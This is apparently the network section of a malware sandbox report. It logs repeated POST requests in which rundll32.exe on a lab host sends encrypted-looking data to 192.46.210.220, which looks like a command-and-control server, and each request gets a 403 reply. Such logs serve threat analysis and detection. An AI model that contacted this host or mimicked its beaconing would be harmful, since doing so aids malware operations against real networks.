2021-10-28 03:26:13 UTC	0	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:14 UTC	4	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49746	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:15 UTC	4	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:15 UTC	5	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:15 UTC	9	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:15 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49787	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:35 UTC	49	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:35 UTC	49	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:36 UTC	54	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:36 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49789	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:36 UTC	54	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:36 UTC	54	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:37 UTC	59	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:37 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49795	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:39 UTC	59	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:39 UTC	59	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:40 UTC	64	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49797	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:40 UTC	64	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:40 UTC	64	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:41 UTC	69	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:41 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49803	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:43 UTC	69	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:43 UTC	69	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:44 UTC	73	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49805	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:44 UTC	74	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:44 UTC	74	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:44 UTC	78	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:44 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49811	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:47 UTC	79	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:47 UTC	79	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:48 UTC	83	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49813	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:48 UTC	84	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:48 UTC	84	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:48 UTC	88	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:48 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49819	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:51 UTC	88	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:51 UTC	89	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:51 UTC	93	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49821	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:52 UTC	93	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:52 UTC	94	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: &U\9N'CV`jyhIJW,wxiC`[5kVSg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:52 UTC	98	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:52 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49756	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:19 UTC	9	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:19 UTC	9	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:20 UTC	19	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49827	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:54 UTC	98	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4814 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:54 UTC	98	OUT	Data Raw: 1a 91 33 32 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 37 cd bb 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a Data Ascii: 32&U\9N'CV`jyhIJW,wxiC`[5k7Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 03:26:55 UTC	103	IN	HTTP/1.1 403 Forbidden Server: nginx/1.15.12 Date: Thu, 28 Oct 2021 03:26:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.3	49829	192.46.210.220	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-28 03:26:55 UTC	103	OUT	POST / HTTP/1.1 Host: 192.46.210.220 Content-Length: 4802 Connection: Close Cache-Control: no-cache
2021-10-28 03:26:55 UTC	103	OUT	Data Raw: c4 ed 03 ef 10 0d 26 ad 55 b4 5c a3 1f 39 4e 94 e5 ac 27 f8 a8 af ff 43 03 1d 86 ce df 56 90 12 f5 f0 bb 60 6a 04 d9 e4 cc af f5 ee d0 1b 9c 84 fe b4 79 68 92 0f 49 4a 57 2c 8c 07 77 16 78 f7 69 f9 c4 0c 43 f4 60 94 5b b9 8a 35 6b 05 56 d3 bb ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 